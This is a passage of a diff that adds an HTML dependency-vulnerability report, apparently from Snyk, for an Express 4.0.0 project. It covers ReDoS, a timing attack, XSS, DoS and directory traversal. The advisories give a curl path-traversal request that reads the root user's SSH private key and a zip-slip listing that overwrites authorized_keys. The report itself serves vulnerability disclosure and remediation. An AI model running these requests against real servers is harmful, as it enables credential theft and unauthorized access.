+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>path-to-regexp</code> to version 0.1.12 or higher.</p><h2>References</h2><ul><li><a href="https://blakeembrey.com/posts/2024-09-web-redos" target="_blank" rel="noopener noreferrer">Blog Post</a></li><li><a href="https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-PATHTOREGEXP-8482416" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">86</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Non-Constant Time String Comparison</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:cookie-signature:20160804</li>
+      <li class="card-meta-item">CWE-208</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> cookie-signature@1.0.3</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; cookie-signature@1.0.3</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/cookie-signature" target="_blank" rel="noopener noreferrer">&#39;cookie-signature&#39;</a> is a library for signing cookies.</p><p>Versions before <code>1.0.4</code> of the library use the built-in string comparison mechanism, <code>===</code>, and not a time constant string comparison. As a result, the comparison will fail faster when the first characters in the token are incorrect.</p><p>An attacker can use this difference to perform a timing attack, essentially allowing them to guess the secret one character at a time.</p><p>You can read more about timing attacks in Node.js on the Snyk blog: https://snyk.io/blog/node-js-timing-attack-ccc-ctf/</p><h2>Remediation</h2><p>Upgrade to <code>1.0.4</code> or greater.</p><h2>References</h2><ul><li><a href="https://github.com/tj/node-cookie-signature/blob/master/History.md#104--2014-06-25" target="_blank" rel="noopener noreferrer">GitHub History</a></li><li><a href="https://github.com/tj/node-cookie-signature/commit/39791081692e9e14aa62855369e1c7f80fbfd50e" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:cookie-signature:20160804" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">69</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting (XSS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:express:20140912</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> express@4.0.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/express" target="_blank" rel="noopener noreferrer"><code>express</code></a> is a minimalist web framework.</p><p>Affected versions of this package do not enforce the user&#39;s browser to set a specific charset in the content-type header while displaying 400 level response messages. This could be used by remote attackers to perform a cross-site scripting attack, by using non-standard encodings like UTF-7.</p><h2>Details</h2><p>&lt;&lt;XSS&gt;&gt;</p><h2>Recommendations</h2><p>Update express to <code>3.11.0</code>, <code>4.5.0</code> or higher.</p><h2>References</h2><ul><li><a href="https://github.com/expressjs/express/releases/tag/3.11.0" target="_blank" rel="noopener noreferrer">GitHub release 3.11.0</a></li><li><a href="https://github.com/expressjs/express/releases/tag/4.5.0" target="_blank" rel="noopener noreferrer">GitHub release 4.5.0</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:express:20140912" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">74</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:qs:20140806-1</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> qs@0.6.6</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; qs@0.6.6</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/qs" target="_blank" rel="noopener noreferrer">qs</a> is a querystring parser that supports nesting and arrays, with a depth limit.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS). When parsing a string representing a deeply nested object, qs will block the event loop for long periods of time. Such a delay may hold up the server&#39;s resources, keeping it from processing other requests in the meantime, thus enabling a Denial-of-Service attack.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>qs</code> to version 1.0.0 or higher.</p><h2>References</h2><ul><li><a href="https://nodesecurity.io/advisories/28" target="_blank" rel="noopener noreferrer">Node Security Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:qs:20140806-1" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">39</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Directory Traversal</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:send:20140912</li>
+      <li class="card-meta-item">CWE-23</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> send@0.2.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; send@0.2.0</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/send" target="_blank" rel="noopener noreferrer">send</a> is a library for streaming files from the file system.</p><p>Affected versions of this package are vulnerable to Directory-Traversal attacks due to insecure comparison.</p><p>When relying on the root option to restrict file access a malicious user may escape out of the restricted directory and access files in a similarly named directory. For example, a path like <code>/my-secret</code> is consedered fine for the root <code>/my</code>.</p><h2>Details</h2><p>A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with &#34;dot-dot-slash (../)&#34; sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.</p><p>Directory Traversal vulnerabilities can be generally divided into two types:</p><ul><li><strong>Information Disclosure</strong>: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.</li></ul><p><code>st</code> is a module for serving static files on web pages, and contains a <a href="https://snyk.io/vuln/npm:st:20140206" target="_blank" rel="noopener noreferrer">vulnerability of this type</a>. In our example, we will serve files from the <code>public</code> route.</p><p>If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.</p><pre><code>curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
+</code></pre><p><strong>Note</strong> <code>%2e</code> is the URL encoded version of <code>.</code> (dot).</p><ul><li><strong>Writing arbitrary files</strong>: Allows the attacker to create or replace existing files. This type of vulnerability is also known as <code>Zip-Slip</code>.</li></ul><p>One way to achieve this is by using a malicious <code>zip</code> archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.</p><p>The following is an example of a <code>zip</code> archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in <code>/root/.ssh/</code> overwriting the <code>authorized_keys</code> file:</p><pre><code>2018-04-15 22:04:29 .....           19           19  good.txt
+2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
+</code></pre><h2>Remediation</h2><p>Upgrade to a version greater than or equal to 0.8.4.</p><h2>References</h2><ul><li><a href="https://github.com/visionmedia/send/pull/59" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/visionmedia/send/commit/9c6ca9b2c0b880afd3ff91ce0d211213c5fa5f9a" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:send:20140912" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">40</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Root Path Disclosure</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:send:20151103</li>
+      <li class="card-meta-item">CWE-200</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> send@0.2.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; send@0.2.0</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/send" target="_blank" rel="noopener noreferrer">Send</a> is a library for streaming files from the file system as an http response. It supports partial responses (Ranges), conditional-GET negotiation, high test coverage, and granular events which may be leveraged to take appropriate actions in your application or framework.</p><p>Affected versions of this package are vulnerable to a Root Path Disclosure.</p><h2>Remediation</h2><p>Upgrade <code>send</code> to version 0.11.1 or higher.</p><p>If a direct dependency update is not possible, use <a href="https://snyk.io/docs/using-snyk#wizard" target="_blank" rel="noopener noreferrer">snyk wizard</a> to patch this vulnerability.</p><h2>References</h2><ul><li><a href="https://github.com/pillarjs/send/pull/70" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/pillarjs/send/commit/98a5b89982b38e79db684177cf94730ce7fc7aed" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/expressjs/serve-static/blob/master/HISTORY.md#181--2015-01-20" target="_blank" rel="noopener noreferrer">GitHub History</a></li><li><a href="http://expressjs.com/advanced/security-updates.html" target="_blank" rel="noopener noreferrer">Expressjs Security Update</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:send:20151103" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">57</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Cross-site Scripting</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-SEND-7926862</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> send@0.2.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; send@0.2.0</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/pillarjs/send" target="_blank" rel="noopener noreferrer">send</a> is a Better streaming static file server with Range and conditional-GET support</p><p>Affected versions of this package are vulnerable to Cross-site Scripting due to improper user input sanitization passed to the <code>SendStream.redirect()</code> function, which executes untrusted code. An attacker can execute arbitrary code by manipulating the input parameters to this method.</p><p><strong>Note:</strong></p><p>Exploiting this vulnerability requires the following:</p><p>1) The attacker needs to control the input to <code>response.redirect()</code></p><p>2) Express MUST NOT redirect before the template appears</p><p>3) The browser MUST NOT complete redirection before</p><p>4) The user MUST click on the link in the template</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>send</code> to version 0.19.0, 1.1.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-SEND-7926862" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">57</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Cross-site Scripting</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-SERVESTATIC-7926865</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> serve-static@1.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1</div>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/expressjs/serve-static" target="_blank" rel="noopener noreferrer">serve-static</a> is a server.</p><p>Affected versions of this package are vulnerable to Cross-site Scripting due to improper sanitization of user input in the <code>redirect</code> function. An attacker can manipulate the redirection process by injecting malicious code into the input.</p><p><strong>Note</strong></p><p>To exploit this vulnerability, the following conditions are required:</p><p>1) The attacker should be able to control the input to <code>response.redirect()</code></p><p>2) express must not redirect before the template appears</p><p>3) the browser must not complete redirection before:</p><p>4) the user must click on the link in the template</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>serve-static</code> to version 1.16.0, 2.1.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-SERVESTATIC-7926865" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">35</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:mime:20170907</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> mime@1.2.11</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; accepts@1.0.0 &#x203A; mime@1.2.11</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 3 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; send@0.2.0 &#x203A; mime@1.2.11</div>
+        <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; type-is@1.0.0 &#x203A; mime@1.2.11</div>
+        <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4 &#x203A; mime@1.2.11</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/mime" target="_blank" rel="noopener noreferrer">mime</a> is a comprehensive, compact MIME type module.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It uses regex the following regex <code>/.*[\.\/\\]/</code> in its lookup, which can cause a slowdown of 2 seconds for 50k characters.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
